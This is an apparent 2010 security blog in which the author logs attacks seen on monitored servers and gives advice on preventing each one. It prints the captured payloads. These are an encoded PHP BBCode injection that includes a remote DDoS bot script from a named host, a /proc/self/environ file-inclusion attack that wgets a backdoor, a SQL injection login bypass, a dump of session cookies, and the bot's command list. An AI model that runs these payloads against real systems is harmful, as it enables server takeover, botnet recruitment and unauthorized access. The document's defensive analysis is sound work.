Web Security Log

Sunday, September 19, 2010

Hoping for the Best

Event Details

Date

19 September 2010

COOKIE Values

Name	Value
ASPSESSIONIDSCRTBQQC	JGNLBCPCKBOMMKEIJFCJMPFM
CFID	22383750
CFTOKEN	51721005
CFGLOBALS	urltoken=CFID#=22383750&CFTOKEN#=51721005#lastvisit= {ts \'2010-09-19 16:18:43\'}#timecreated={ts \'2010-09-19 16:18:43\'}#hitcount= 2#cftoken=51729001#cfid=21383760#
X-Mapping-didaedea	EB0B1083BAF4C099C589235951FDADBB
X-Mapping-caklakng	4A5C5709EC4B181DC062F79B5B21E09C
_icl_current_language	es
PHPSESSID	1c1c463d4ad1c2a798e26c1af3ba3da2
X-Mapping-edafcnem	579465E39B484F85E6231FC9E6D1E138
BALANCEDID	balancer.www281
_netadventist3_session	6e30595e8493a9f11a50303c6f8b3c4f
27120c955796957883def31ab	14a052b4d9bc3bfa241ef361cf628884
wordpress_test_cookie	WP Cookie check
ASPSESSIONIDSACDTSDA	NHMLENACFGBEHMCABMDHKDKE
fc	fcVal
parkinglot	1
JSESSIONID	1qutet5rna2pq
LB	1924488576.20180.0000
qtrans_cookie_test	qTranslate Cookie Test
tmgioct	TfNxDct6ErNB31xoEqZceoIc
sid_1_1	a7703732a7afa22fe260a067c65c7990
BIGipServerbit-inet-http-linux	37803466.20481.0000
SessionID	db3a7c81-3741-4f9a-a900-5d97ce333560
VisitorID	2a3dd61e-1bf6-42ea-a399-d4d2ad86f40c&Exp
googleToken	ZGMGKDOD2McKEwie0O3aiZSkAhUOIIcKHUYYesgYAyAAMPj7ggE4DVD4- 4IBUKT5mA9Q9vKxEVDU6IQbUIq23B5Q8dqtKQ
pixelstats_visitor_id	67331fee75245061388da3fd9e77df72
d528690ac3f32d512b24a75	5b7ccecde84ae7c9a42e3810d5cfa413
SESSfb1d8525d94d660bc8f92	9hscilkep1adt9of1agj8tum54
BX	868p31969ciuf&b
SERVERID	web1-2
tu	061b31ae4fe862878a7595117ae8416a
X-Mapping-nbjnphkm	8DA8508445391E23666146AE567F08EC
Apache	95.65.x.x.835171294912545338
X-Mapping-kjicghkc	C960851A671102A97B52FDBF75C01665
b91c4587747e94d96ce5d3	fbcab89b0ce5f389779ded811f402d4c
CFCV_MERCHANTLASTVISITTIME	{ts \'2010-09-19 09:26:05\'}
X-Mapping-beedigeg	5E30EDBC3F2176516FE6669D5F48B32E
wordpress_d76e66a54228b4	\|1286123411\|bbff8436665d6b302d1c6abeeab7bc04
wordpress_logged_in_d76e66a54228	\|1286123411\|d68e34164b9b1a0b21f92baef42e9d84
ASPSESSIONIDQAAADCBS	OHCHFJADOJKJCBFEOPFKALCN
wikidot_token7	71ad16ad2c4d81f328082ff6c4b20768
VSESSID	1359648.dca700188a89324e44f3e81bf58d4aa6
VISITID	6e193f4b3162a051fece049be7fac04b
COMMUNITY_ID	1359658.b2219323397be5f626b3c2c0100ea84b
language	en
TRIBE_NET	b
ljuniq	gl3ocO74evXTwzM:1284914251:pgstats0:m0
bncom	95.65.xx.xx.241961284920569217
BNS	c1d60fa2c29235f0abc24034ff19d470
lot	1285519205
USER_COUNTRY	RO
USERNAME	deleted
UP	deleted
IPSET	deleted
lastpage	devilsinferno
GEOIP_COUNTRY_CODE	MD
ARPT	JIUJWUS10.201.6.104CKMKM
Coyote-2-d81ebee0	d8c54a52:0
golfczech_session	nh4l85bhnp5tqp22cv51if8677
TS5d4ca4	c388a426083b9296b647cf490399f55d0533d6b8bac9704a4c963e62
cl_b	1284915225980101709
appletvsource_com	8nf7q9lp2a84a9kr1dkeih96n0
xn_visitor	b74a0c19-a529-45f5-1d6f-17697f716573
ning_session	l8UkOxI3LABk5Kk9GbCk/Iai2V31f0zebfJS4Yg/NOj3EBhXV 4sA7KUbx66EgnL19vQa9yn/Gg
SESS19be68902958250fb1aabe273a8e37c6	0088cgm6ucm52otu62d6etgbd2
ASP_NET_SessionId	50ygrp45hg5a4kzrpdchrkzs
rl-sticky-key	c0a8005251
Geo	{\"city\":\"Chisinau\",\"country\":\"MD\",\"lat\":\"47.005600\",\"lon\":\"28.857500\"}
datr	1284915781-d92ab9c6f7bd8e6cd366b4ef22e66fd8be1efcddae1128b43a3c9
BIGipServerbensbargains_POOL	2447708342.20481.0000
vis	nSB7MgX1MM3gmaBD6yVGB9uAuruCbkxsMqGcSOqIZN/RVjnHdGoGbcji55I6PBcYFOid/nH7RyzLbIi2XIO 5 HTD3XNFjIdauVbD/QYFjaEwvPUxhyNkWIT4yGIF6Sg
X-Mapping-eacdndmj	E0173EA196311D523CD792DA546E7F1F
pen	14
f4c2dbffe8b9bb602e4145d5dd5ad48c	-
exp_last_visit	1284913845
exp_last_activity	1284944714
ee_language	_irish
mvp_session	088f0cdeec0dd1ba6a45311d6257139d
wp_ozh_wsa_visits	1
wp_ozh_wsa_visit_lasttime	1284917831
X-Mapping-hmaddpem	B1B24346D692009D6D05252779F5C8AB
abtest	a
ASPSESSIONIDSQSBRQDC	CPNGANLCHIBBJADLMJNDAAAF
h	09392d5de016c2eba5d5e66f5d2581bc
protected	11
zf_5y_visitor	-A6un8UwaiKZgFNt38zCsl9BSoIAAAAAZlJq5yMN51sz
Coyote-2-b869c4c1	b869c41c:0
session_id	\"ce49065f87912cb219f96566910f4e84f0898974::95.65.74.130\"
X-Mapping-jhoibjei	04BDBCMEE22CBB3BFFC49AA4445AF849
dublbom_com	51a4784b26b5ef6c87a4a563ea3779d1
_zsess	BAh7BjoPc1Vzc2lvbl9pZCIlMjhjYzRlMjMwOTRjOGQ2MWRhMzU0NzU=-- a84415741b6bb513ed083488ec51
cweb	JONQJVSxx.x.xxx.xxxCKMKY
SESSc9b1f25375c7119f0d5b1d92de2dfbaa	487e7e7dd4ac0246fa9m962295783dca
simtel_cookie	302987322.261.0000
_redmine_session	BAh7BjbPc2Vzc2lvbl9pZCIlY2EyYzk3NWQ4N=-- ae98617c73721ef0c5c3ff359f67f75c3a5

SERVER Values

HTTP_USER_AGENT: Opera/9.51 (Windows NT 5.1; U; en)

What the hacker was hoping for

Looking at this, it seems quite apparent that the attack was attempting to access restricted parts of the site (or access 3rd party software on your site) by throwing every authentication sessions he can think of at the website.
From Wordpress (Blogging Software) to x-mapping (Process Mapping) to ning (Social Network) to wikidot (Social Media).

The attacker is hoping that you will be running one of the various softwares that he is catering for and that his cookie exploit will be successful.

Alternatively he might be running a spam bot and hopes that the sessions will allow him access to the comment sections of various blogs and social platforms so he can comment spam.

How to prevent this

Ensure that your 3rd party software is always up to date
- Register for the release mailing list
- Check regularly on the site

What we know about the visitor
This is only from one IP address (originating from Moldova, EU) and the cookie pattern should make for an interesting breakdown. Some of them might even be valid authentication cookies for 3rd party media sites.

Threat Level
Low

Course of Action
If this has happened to you, do the following:

Check and remove unautherized 3rd party user accounts
Update your 3rd party software

Tuesday, September 14, 2010

The Cold Fusion Request

Event Details

Date
14 September 2010

POST Values
CFID:

xxxxxxxx, CFTOKEN=xxxxxxxx, CFGLOBALS=urltoken=CFID#=xxxxxxx&CFTOKEN#=xxxxxxx#lastvisit={ts '2010-09-14 14:33:18'}#timecreated={ts '2010-09-14 14:33:18'}#hitcount=2#cftoken=xxxxxxxx#cfid=xxxxxxxx#, __mmsid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx, __mmuid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx, __mmtrk=0|||x|xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

What the hacker was hoping for

This isn't actually a hack attempt. What this is is cold fusion's horrible built in session handler. It will crop up occasionally in your logs. Sometimes they are forged, sometimes not. However if you're not running Cold Fusion (which you shouldn't be), you should be safe.

How to prevent this

Don't run Cold Fusion

Friday, July 9, 2010

The IRC Bot

Event Details

Date
9 July 2010

POST Values
author_name:

[php]echo(base64_decode("ZU5kQQ==").php_uname().base64_decode("ZU5kQQ=="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));;die();[/php]

SERVER Values
HTTP_USER_AGENT: Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)

What the hacker was hoping for

This is an interesting one as it seems that the hacker is trying to perform some type of BBCode injection and hope that the library that performs the BBCode formatting will translate and execute the php code enclosed by [php].

The php would then decode those encoded strings and execute something that looked a little like this:

[php]echo "eNdA" . php_uname() ."eNdA";
include("http://planetworkteam.fileave.com/ddos.txt??");
include("http://planetworkteam.fileave.com/ddos.txt??");; die();[/php]

The included remote files would then start up an IRC bot and connect to a remote IRC server where it would wait for commands from a controller. The list of commands this bot can perfom are as followed:

.user  //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail     //send an email
.dns  //dns lookup
.download   //download a file
.exec  // uses exec() //execute a command
.sexec  // uses shell_exec() //execute a command
.cmd  // uses popen() //execute a command
.info //get system information
.php  // uses eval() //execute php code
.tcpflood      //tcpflood attack
.udpflood     //udpflood attack
.raw  //raw IRC command
.rndnick //change nickname
.pscan   //port scan
.safe  // test safe_mode (dvl)
.inbox  // test inbox (dvl)
.conback   // conect back (dvl)
.uname // return shell's uname using a php function (dvl)

The source code also contains an encoded Perl script used to connect and download data from a remote location and spawn bash shells (called "Data Cha0s Connect Back Backdoor").

How to prevent this

Sanitize your inputs

Properly configure any 3rd party libraries.
- If a 3rd party library allows users to execute arbitrary code then you're asking for trouble.

What we know about the visitor
These attacks have come from numerous IP addresses (most likely compromised machines), so it won't help us identify the hacker.

Attacking Ips:

24.120.145.188
38.117.65.242
41.78.28.104
62.12.136.135
62.44.82.118
62.44.123.3
64.34.170.92
64.89.247.4
64.156.24.220
65.183.182.51
66.76.26.88
66.98.216.16
66.135.41.16
66.230.225.82
67.148.93.62
67.222.22.44
69.70.153.210
69.73.155.53
69.197.157.190
72.1.114.141
72.55.156.70
72.55.165.45
74.206.118.177
75.125.43.162
80.172.236.56
80.177.1.221
81.2.252.33
81.93.192.2
81.93.240.71
81.169.129.100
83.96.231.105
83.143.81.42
84.21.8.208
84.255.193.115
85.19.150.100
87.238.162.10
88.84.142.223
89.32.43.251
89.33.78.92
89.200.169.131
91.121.79.138
91.121.175.184
93.186.192.124
93.190.48.203
94.23.205.159
94.143.220.3
95.168.196.66
98.108.68.50
99.7.55.150
109.86.145.204
114.108.151.149
119.235.18.12
157.181.172.226
157.181.239.239
173.55.123.62
187.45.193.227
188.241.116.138
189.59.8.29
190.95.200.114
192.154.46.38
193.226.30.130
193.246.108.253
194.50.101.248
195.5.163.206
195.199.40.194
195.216.196.122
195.228.86.27
196.41.123.167
199.184.237.35
200.201.180.130
201.116.197.150
202.75.36.10
203.147.62.92
204.15.37.220
204.122.16.64
206.123.118.132
207.218.209.178
208.79.205.56
208.101.48.50
209.85.52.140
209.126.254.119
210.0.213.83
211.206.120.196
211.210.38.8
212.59.6.16
212.61.10.82
212.159.7.202
213.163.84.4
213.165.85.241
213.199.192.18
213.232.94.135
217.64.195.236
217.112.42.77
217.112.84.13
218.38.34.19
219.94.129.49

We can see the HTTP_USER_AGENT is rather unique and can be used to identify visits from the hackers scripts.

Browser	Netscape 4.7
OS	Solaris
Language	ru (Russian)

The source code of the IRC bot contains comments both in English and Portuguese. By the looks of it, the code was originally written by an English speaker and later adapted (based on variable names, location of comments, etc) by the Portuguese speaker.

What we do know is where this hacker and his bots hang out (IRC server and channels are listed in the source code).

Threat Level
Medium

Course of Action
If this has happened to you, do the following:

Take the server offline (if possible)

Check active process list for unknown scripts and kill them

Fix or remove the vulnerable library

Monitor you logs. The hacker will probably return and attempt to reinfect your server.

If you don't use it yourself, block both inbound and outbound access to port 6667 (default IRC port)

Friday, June 25, 2010

The proc/self/environ Injection

Event Details

Date
21 June 2010

POST Values
file: ../../proc/self/environ

SERVER Values
HTTP_USER_AGENT: <? exec(\"wget http://[remotescript].txt -O backdoor.php\"); ?>
This is a simplified version of what was captured in the user agent field.

What the hacker was hoping for
What we have hear is a local file injection attack coupled with injected PHP code.

The visitor hopes that my code that handles file inclusion is written something like this:

<?php
// Include file requested
include($_GET['file']);
?>

Thus the file that will be included would be:

/var/www/../../proc/self/environ (which equates to /proc/self/environ)

The hacker is attempting to include the proc details about the current Apache thread. /proc/ contains information about all the running threads, /proc/self/ contains the current thread being run). Apache stores various values in the /proc/self/environ (environment variables) such as the visitors IP address, user agent, script called and other values like this:


DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID= HTTP_HOST=www.example.com HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) PATH=/bin:/usr/bin QUERY_STRING= REMOTE_ADDR=x.x.x.x REMOTE_PORT=xxxx REQUEST_METHOD=GET REQUEST_URI=/index.php SCRIPT_FILENAME=/var/www/index.php SCRIPT_NAME=/index.php SERVER_ADDR=x.x.x.x SERVER_ADMIN=webmaster@example.com SERVER_NAME=www.example.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE=
Apache/2.0 (Unix)

However, since the hacker has set his own custom User-Agent (HTTP_USER_AGENT), that will be included and executed as PHP code. The PHP code would then execute shell commands to retrieve a remote script, download it to the server and place it in the website folder:

<?
// Fetch remote script and place in /tmp/dump
exec("wget http://[remotescript].txt -O backdoor.php");
>

Now the hacker can now visit his page and run any commands he wants on your webserver.

http://www.example.com/backdoor.php

How to prevent this

Sanitize your inputs
- Ensure that directory traversal is disabled/checked for
- Work with an allowed list of files
  $allowed_files = array('file1.php', 'file2.php'); $allowed_index = array_search($_GET['file'], $allowed_files) if ($allowed_index !== NULL) { include $allowed_files[$allowed_index]; }
- Don't allow visitors to specify by name
  $allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php'); if (!empty($allowed_files[$_GET['file']])) { include $allowed_files[$_GET['file']]; }

Threat Level
High

Course of Action

If this has happened to you, do the following:

Take the server offline (if possible)
Check active process list for unknown scripts and kill them
Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
Remove backdoor scripts
Monitor you logs. The hacker will probably return and attempt to reinfect your server.

Thursday, June 24, 2010

The Common Probing

Event Details

Date
22 June 2010

POST Values
username: ' OR 1='1
password: ' OR 1='1

What we have here is a classic probe to determine if the login form is vulnerable to SQL injection or bypassing.

What the visitor was hoping for
The visitor was hoping that I am not sanitizing my inputs and thus when my SQL query is built it will allow him to bypass the login.

Example:
SELECT * FROM user WHERE username='[x]' AND password='[y]' LIMIT 1
Would become:
SELECT * FROM user WHERE username='' OR 1='1' AND password='' OR 1='1' LIMIT 1
This hopefully would allow him to log in as the first row in the user table.

How to prevent this

Sanitize your inputs (type-cast your numerics were possible)
Prepare your queries

If you are unsure on how to do this, I recommend reading up on SQL Injections Attacks.

What we know about the visitor
Any visit to your website will always provide you with a wealth of information about the visitor. By simply examining the IP address and the HTTP headers passed, we can normally determine a lot about the visitor.

Firstly we make a quick trip to a whois lookup tool and we find that the IP address belonged to the block assigned to Saudi Arabia (109.82.40.0 - 109.83.255.255). We now can make an educated guess where our visitor is located.

If you want something a bit more accurate, you can look at geoip location services such as MaxMind.

Now we'll dig through the HTTP headers.

HTTP_ACCEPT_LANGUAGE
This will let us know what is the preferred language of the visitor. In this case the preferred language is ar-SA. A quick lookup on a language code chart shows us that that denotes Arabic (Saudi Arabia).

HTTP_USER_AGENT
The HTTP_USER_AGENT header can provide us with more information that just what browser the person is using.

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; AskTbGOM2/5.7.0.231)

A quick visit to http://user-agent-string.info will give us a breakdown of the user agent string.

Browser	Internet Explorer 8.0
OS	Windows 7
Installed .NET Versions	2.0.50727, 3.5.30729, 3.0.30729
Office Suite	Probably (Infopath v.2 MS Office Component installed)

HTTP_X_BLUECOAT_VIA
The visitor is going through a Bluecoat proxy. The value passed in this field is the proxy session for the visitor.

REMOTE_ADDR
This is often the IP address of the visitor. In this case it is the IP address of the Bluecoat proxy.

Threat level

Low

Course of Action

Add weight to visitors from Bluecoat proxies

(When I refer to weight, I'm talking about the weighting that is assigned to a request that determines whether the request is a hostile action and whether it should be blocked or reported).

Introduction

Welcome to Web Security Log. This blog will be dedicated to the listing of incoming attacks on various servers I monitor. I'll endever to explain each attack, what the attacker is hoping to achieve and ways to protect yourself against these attacks.